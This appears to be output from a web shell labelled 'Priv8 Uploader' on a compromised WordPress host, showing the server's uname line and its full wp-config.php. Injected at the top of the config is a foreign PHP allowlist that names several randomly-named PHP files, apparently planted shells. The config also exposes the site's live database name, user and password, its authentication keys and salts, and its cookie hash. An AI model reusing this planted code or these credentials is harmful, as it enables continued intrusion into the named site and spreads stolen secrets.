GIF89a;
Priv8 Uploader By InMyMine7
Linux server.fluxioninnovation.in 6.8.0-1041-oracle #42~22.04.1-Ubuntu SMP Fri Dec 5 16:59:35 UTC 2025 aarch64
<?php $allowedFiles=['index.php','wp-v40mb647.php','wp-nex17ib2.php','j9e6smth.php','wp-sign.php','wp-set.php','wp-sx21.php','wp-sx9.php','wp-sx-generator.php','wp-links-opml.php','wp-login.php','wp-activate.php','wp-signup.php','edit-form-advanced.php','ms-sites.php','options-writing.php','themes.php','link.php','ms-themes.php','plugin-editor.php','ms-upgrade-network.php','edit.php','ms-users.php','plugins.php','media-new.php','my-sites.php','post-new.php','admin.php','edit-tags.php','media.php','nav-menus.php','post.php','export.php','network.php','press-this.php','upload.php','options-discussion.php','privacy.php','user-edit.php','menu.php','options-general.php','profile.php','user-new.php','revision.php','users.php','custom-background.php','ms-admin.php','options-media.php','setup-config.php','widgets.php','custom-header.php','ms-delete-site.php','options-permalink.php','term.php','customize.php','link-add.php','ms-edit.php','edit-comments.php','link-manager.php','ms-options.php','options-reading.php','tools.php','site-editor.php','update-core.php','import.php','site-health.php','export-personal-data.php','erase-personal-data.php','theme-editor.php','options-privacy.php'];$currentFile=basename($_SERVER['SCRIPT_FILENAME']);if(!in_array($currentFile,$allowedFiles,true)){header('HTTP/1.1 403 Forbidden');exit('HTTP/1.0 403 Forbidden');}if(basename(__FILE__)===$currentFile){header('HTTP/1.1 403 Forbidden');exit('HTTP/1.0 403 Forbidden');}?><?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'fluxionuser_kastudio' );
/** Database username */
define( 'DB_USER', 'fluxionuser_Kastudio' );
/** Database password */
define( 'DB_PASSWORD', 'Kastudio@123' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '(bTY([hf>p+>.X+hk7oP9vq U{)KkG!,N*]m{ >I8wWX<gcN2lGNF@` oi^Bz8uh' );
define( 'SECURE_AUTH_KEY', 'Y!.5/X_hQIp%i)1#{.Rw!G>8l_;#<orAk.e^we gcV2?}M{F*VF.y{ .UlfZ}|P`' );
define( 'LOGGED_IN_KEY', ':`BQuT7WQdMj5O|yc!@*UcL<mA%u*bYry5pW]Ld.c<):fxz9k `d@L|DV%)-{Jq<' );
define( 'NONCE_KEY', ',[][d*B`m3Wcm*K$*y-lcA)DlIZlYpS-}H)}:EWZ:<8`;yQH. R9a@A?7Ac&6XVH' );
define( 'AUTH_SALT', '_[.YT`,P;#eCf2->)|!n>5)of^p[xOs)lKbq ^ASU-:[/GqM;#wE`U0T9<ictr>4' );
define( 'SECURE_AUTH_SALT', '7YbO%JLWpAa22;ik<%eAlcH(}^K|&(.~q3u.Ep%ez|s;WF1k,)x7|_A8%>*@c xS' );
define( 'LOGGED_IN_SALT', 'Cw0Y+p,)-~VcFteyq424$_3.#TiU),x^5|~0O`NuftpTgTr.[}{.Ssl,!@TaJ_OF' );
define( 'NONCE_SALT', 'G|!H0ki{Q)bZ(`9#>Te:=nS>2.xF}P vM*t^7z`bh;g;{2rtcHQL2ocq+G+[d18f' );
define( 'WP_CACHE_KEY_SALT', '?xH(fy:b#nld%.oWYFX0&=_MN>htWY?Mxe%,D>by_D6$gg`6?<:80^22@c]S$Q}(' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/* Add any custom values between this line and the "stop editing" line. */
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
define( 'FS_METHOD', 'direct' );
define( 'COOKIEHASH', '761fc272346897dc30647d2238c93cb1' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';